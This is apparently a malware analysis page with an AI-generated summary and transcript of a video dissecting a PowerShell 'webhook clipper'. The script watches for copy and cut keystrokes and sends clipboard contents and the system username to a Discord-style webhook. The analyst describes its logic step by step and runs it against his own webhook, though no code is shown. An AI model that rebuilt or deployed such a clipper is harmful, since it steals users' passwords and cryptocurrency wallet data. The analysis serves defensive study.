PowerShell Webhook Clipper - Malware Analysis Lab

6 minute read

Technical Analysis of a PowerShell Webhook Clipper

Overview (AI generated from video):


This PowerShell script steals clipboard content, including credentials and cryptocurrency wallets, by using native APIs to detect key presses and sending the data to a webhook. Highlights


0:42 💻 The script adds Windows Presentation Foundation DLLs to create a graphical user interface.
2:12 ⚠️ The script continuously runs in the background, constantly monitoring clipboard activity.
4:38 🔒 By updating the webhook URL, the script can send stolen clipboard data to a controlled location.
6:53 📝 Any copied text, including passwords, is immediately sent to the specified webhook.
9:15 ❌ Certain file types may cause errors when copied, revealing the script’s activity.
11:26 📂 The script was tagged as “Posh C2,” but it’s not related to the actual Posh C2 framework.
12:19 🕵️‍♂️ The script was discovered on Paste bin and shared with the community for analysis.

Key Insights

📌 The script’s simplicity and effectiveness showcase the ingenuity of the attacker.
📌 Native APIs and PowerShell’s capabilities allow for easy clipboard monitoring and data exfiltration.
📌 The script’s use of a webhook enables the attacker to remotely receive stolen clipboard content.
📌 Users may unknowingly execute such a script without prompt, making it more dangerous.
📌 The script demonstrates the importance of being cautious when copying sensitive information.
📌 Although the script is basic, it serves as a reminder of the potential risks associated with clipboard usage.
📌 The community’s collaboration in sharing and analyzing malware samples contributes to improved security measures.

Transcript (AI generated from video):

00:00:01	what if I told you that this Powershell script of only 36 lines could steal your credentials your cryptocurrency wallets and anything else that you might copy to your clipboard although it's so rudimentary and primitive it works and there's just something about that that you have to admire and Marvel the Brilliance of so let's take a look at how simple this clip functions this Clipper is using Powershell and what it's doing is adding net assemblies now these dlls that it is using within its script are from the
00:00:44	windows presentation Foundation dlls things that are used for when you're creating a net application giving you a graphical user interface now why would it need to use these I'll show you in just a bit first first off let's look at this function dis chat dis chat is taking a parameter given which is content and then it's also defining a hook URL now this is where the data is going to be sent to it's defining a username and that is taking the username from your operating system environment variable so it's getting your username
00:01:25	for the computer system it's then taking the content and posting all this to that hook URL what it's doing here under dis chat when it runs straight away when it runs it's going to get the contents of your clipboards and post it to that web hook then while one which basically means while true and considering there's nothing to Define it not as true it will always be running so while this is running it's defining a few different variables your left control your right control your C and your X key now at
00:02:01	first I didn't think there was anything too remarkable about this and yet I still don't think that there's anything too remarkable about this and that's the beauty of it it's just using the native apis to detect whether you have your control key down and then whether you have your C or X key down for copy or cut and if you do it's going to invoke that method and post it off to the web hook thus taking the contents of your clipboard and sending it somewhere else so I'm going to take this script and
00:02:39	update the hook URL to something that I control in this particular case I'm going to change it from web hook. site to a particular Discord web hook that I have set up and if I go and update this web hook to it now what I can do is save this script and actually just see whether it functions right and what we start getting into our Discord Channel make sure that we can see what's in our Discord Channel first and now run the script with Powershell and my security settings might actually be set up so this this
00:03:19	asks me to allow the script to run but in a lot of cases depending on how this is being deployed you're not going to have that prompt and it's just going to run it could actually be that this is just functioning now yeah without uh any kind of restriction well you can already see I didn't even notice but it's already sent the web hook that was in my clipboard off to our Discord server you can see it's been sent as Barry which is the username on this particular system so let's make sure that it works if we use
00:03:50	any of our keyboard shortcuts I'm going to just open up notepad and maybe just type something like yeah this is super secret credentials and to access crypto wallets and let's say I needed this and I used the old contrl C or contrl X sorry in that particular case I actually hit contrl V to paste so that was stupid um but let's say let's say I actually want to want to do this and I have to copy this copy that to clip board oh it's there what if I cut this oh it's there almost immediately what if I copy
00:04:37	this file nothing happens if I control C the file you'll see a big error message on the particular script because what the get clipboard module in Powershell is doing is only supportive for PL teex strings or just strings in general right but anything that we copy in that particular regard let's say it's a password we take this yep we take this we kind of proven the fact right that everything we copy is winding up in this Discord channel so this is something to be aware of something that's a bit
00:05:13	interesting and I thought it was kind of cool that no matter how primitive this Powershell script is it functions you don't have to stand up any kind of infrastructure so I will say the sample was downloaded uh by malware Bazar and it was upload by Paul who found it on Pace bin so thanks so much for sharing that with the community Paul uh I will say that it was tagged up as Posh C2 I believe this is from aara Rule and it's not actually the the Posh C2 framework there's poell web hook key logger which
00:05:47	I guess is an app's name I mean a Powershell web hook Clipper might be slightly more accurate but nonetheless it kind of gives the idea of what this script is intending to do so there you go take a look at it and um let me know what you [Music] think